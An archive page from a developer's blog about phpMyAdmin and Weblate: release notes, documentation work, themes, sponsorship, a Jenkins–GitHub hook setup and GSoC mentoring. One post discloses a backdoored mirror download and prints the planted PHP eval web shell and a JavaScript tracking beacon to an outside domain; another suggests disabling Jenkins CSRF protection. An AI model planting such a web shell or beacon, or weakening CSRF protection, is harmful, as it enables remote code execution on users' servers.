Michal Čihař - Blog Archives for phpMyAdmin

Weblate 1.3

Quite on updated schedule (ie. one month later than originally planned), Weblate 1.3 has been released today. It comes with lot of improvements, especially in support of non gettext files, new quality checks and improved performance.

Full list of changes for 1.3:

  • Compatibility with PostgreSQL database backend.
  • Removes languages removed in upstream git repository.
  • Improved consistency checks processing.
  • Added new checks (BB code, XML markup and newlines).
  • Support for optional rebasing instead of merge.
  • Possibility to relocate Weblate (eg. to run it under /weblate path).
  • Support for manually choosing file type in case autodetection fails.
  • Better support for Android resources.
  • Support for generating SSH key from web interface.
  • More visible data exports.
  • New buttons to enter some special characters.
  • Support for exporting dictionary.
  • Support for locking down whole Weblate installation.
  • Checks for source strings and support for source strings review.
  • Support for user comments for both translations and source strings.
  • Better changes log tracking.
  • Changes can now be monitored using RSS.
  • Improved support for RTL languages.

You can find more information about Weblate on it's website, the code is hosted on Github. If you are curious how it looks, you can try it out on demo server. You can login there with demo account using demo password or register your own user. Ready to run appliances will be soon available in SUSE Studio Gallery.

Weblate is also being used https://l10n.cihar.com/ as official translating service for phpMyAdmin, Gammu, Weblate itself and others.

If you are free software project which would like to use Weblate, I'm happy to help you with set up or even host Weblate for you (this will be decided case by case as my hosting space is limited).

Call for Weblate translations

Weblate is close to 1.3 release (should happen on Friday if nothing urgent appears) and it's quite last chance for translators to catch up.

Weblate is of course translated using Weblate, but you can of course also translate Gettext po files directly and either upload them into Weblate or use Github issue tracker for that.

Weblate translation status

If you don't know Weblate yet, it is web based tool for translating with Git integration. You can also call it crowdsourcing platform if you wish :-).

phpMyAdmin's documentation

As I've already written before, phpMyAdmin is getting new documentation. The basic conversion has been already done and merged, but there are always things to improve.

Right now I'm spending my free time on improving that and pushing the documentation forward. But hey, you can help in this area as well - just look at it on http://docs.phpmyadmin.net/ and in case you see any problems, fix them or at least report them.

The easiest way to contribute a fix is to use online editor Github provides. Just navigate to the documentation sources, choose appropriate file, click on edit (what automatically forks the project for you) and once you're satisfied with your changes, open a pull request.

In case this still looks too hard for you, just open a bug report or write us on mailing list or IRC.

And you can of course also contribute to documentation translations, which did unfortunately suffer quite a lot from the documentation conversion.

New documentation for phpMyAdmin

I was quite unhappy with shape of our documentation for some time, but this week I finally found some time to dig deeper into conversion into something more usable.

Nowadays I'm mostly using Sphinx for writing documentation, which allows to easily write using RST and provides output to various formats. Together with Read the Docs service, it makes great combo for providing user documentation, which I use for example for Weblate.

So with a little bit of magic in Python and Beautiful Soup I was able to convert most of the HTML documentation into RST without tons of manual work. The resulting source (and ugly conversion script) temporarily lives on my github and generated documentation is available on Read the Docs.

There are of course still many things to improve, but I think even right now it is easier to navigate than previous monolithic HTML file.

Now we need to decide if and how to integrate this into official repositories and I can then continue on improving the documentation content.

Weblate 1.3 on l10n.cihar.com

As Weblate release is getting closer, I've decided to give new version more testing in real life and it got deployed at http://l10n.cihar.com/.

This release brings quite a lot of new features, most interesting for users might be:

  • Better and new consistency checking.
  • Better support for Android resources.
  • More visible data exports.
  • New buttons to enter some special characters.
  • Support for exporting dictionary.
  • Checks for source strings and support for source strings review.
  • Support for user comments for both translations and source strings.
  • Better changes log tracking.
  • Changes can now be monitored using RSS.

You can see full list of changes in our documentation.

As usual, I hope this upgrade will go smoothly and won't cause any big problems :-).

New phpMyAdmin theme

Today, I've finally found time to process new themes for phpMyAdmin. Result of this are two theme releases.

First one was just a minor update to older theme (Darkblue/orange 2.11), which fixed behavior in Internet Exporer.

Second one was completely new theme for phpMyAdmin 3.5 - blueorange (I admit the name is not too creative). This is actually first contributed theme compatible with 3.5 series.

Of course you can find all of these on our themes page.

Compromised SourceForge mirror

Yesterday, phpMyAdmin security team has been notified about backdoor being distributed together with phpMyAdmin zip file on one of SourceForge mirrors.

We quickly analyzed the issue and confirmed that the backdoor is indeed present in phpMyAdmin-3.5.2.2-all-languages.zip file. It allowed anybody to execute arbitrary PHP code, there was file called server_sync.php which simply called eval on passed data:

<?php @eval($_POST['c']);?>

In addition to this, javascript code has been included, which could allow attacker to track vulnerable installations:

var icon ;
icon = document.createElement("img");
icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";
icon.width=0;
icon.height=0;
document.body.appendChild(icon);

All in all looks like simple, but quite effective way to install backdoor, if they would be able to spread this more widely. We've immediately released PMASA-2012-5 to notify our users.

Luckily this was spot quite fast (looking at used domain, the exploit could not be alive before 22th September 2012) and not on much frequent mirror (based on SourceForge official statement about 400 users have downloaded the file with backdoor).

What still remains unclear is whether this was really only targeted on phpMyAdmin, or there were more modified file on this mirror (SourceForge hosts thousands of projects). I've randomly tried few our other download options from this mirror and none of them was affected, but the mirror was taken offline before I could do some more systematic analysis, so this question can now be answered only by SourceForge.

Sponsoring phpMyAdmin

We've decided to accept sponsorships of phpMyAdmin in more official way. So if you or your company want to financially support this software, you now have great chance to do that.

Time to time we've received offers for sponsoring, but we never got to point where we could easily handle these. In the past we were limited by sf.net requirements for no advertisement on website, but it got leveraged over the time and we did not change our policy much.

For now the only benefit we are providing to our sponsors (besides good feeling that they are supporting good project) is logo and link on our website. In the future we might add some more, but at first we want to see how it works in this scale.

Anyway if you are interested in sponsoring phpMyAdmin, you can do that on our website.

Triggering Jenkins from GitHub

For some time I thought it is not effective to use polling to get latest changes from GitHub into Jenkins, which we use for continuous integration, but II was always too lazy to investigate.

Today I finally took a look at it and it turns out to be quite easy:

  1. Enable Github plugin in Jenkins.
  2. Enable "Build when a change is pushed to GitHub" in project configuration in Jenkins
  3. Disable "Prevent Cross Site Request Forgery exploits" in Jenkins configuration (to prevent bug JENKINS-10263).
  4. Configure Jenkins service hook in GitHub to trigger your server (the URL is http://<jenkins>/github-webhook/.

Try testing the hook and check "GitHub Hook Log" in Jenkins if it really works and you're done.

So now, phpMyAdmin's tests should start as soon as somebody pushes changes to GitHub.

GSoC evaluations submitted

Even though I've planned to do this on Monday, it somehow slipped to Wednesday, but I've finally filled in GSoC 2012 evaluations for all students I mentor at phpMyAdmin.

Generally all of them perform quite well, but there is always room for improvements :-).

The greatest pain every year is filling up evaluations for more students - every each of them starts with same questions for mentor (eg. how many GSoC did you participate in or how much time you spend on GSoC). I know I can copy and paste answers, but still this looks like something not necessary. Also some information is probably already known to Google (eg. in which years I did participate in GSoC).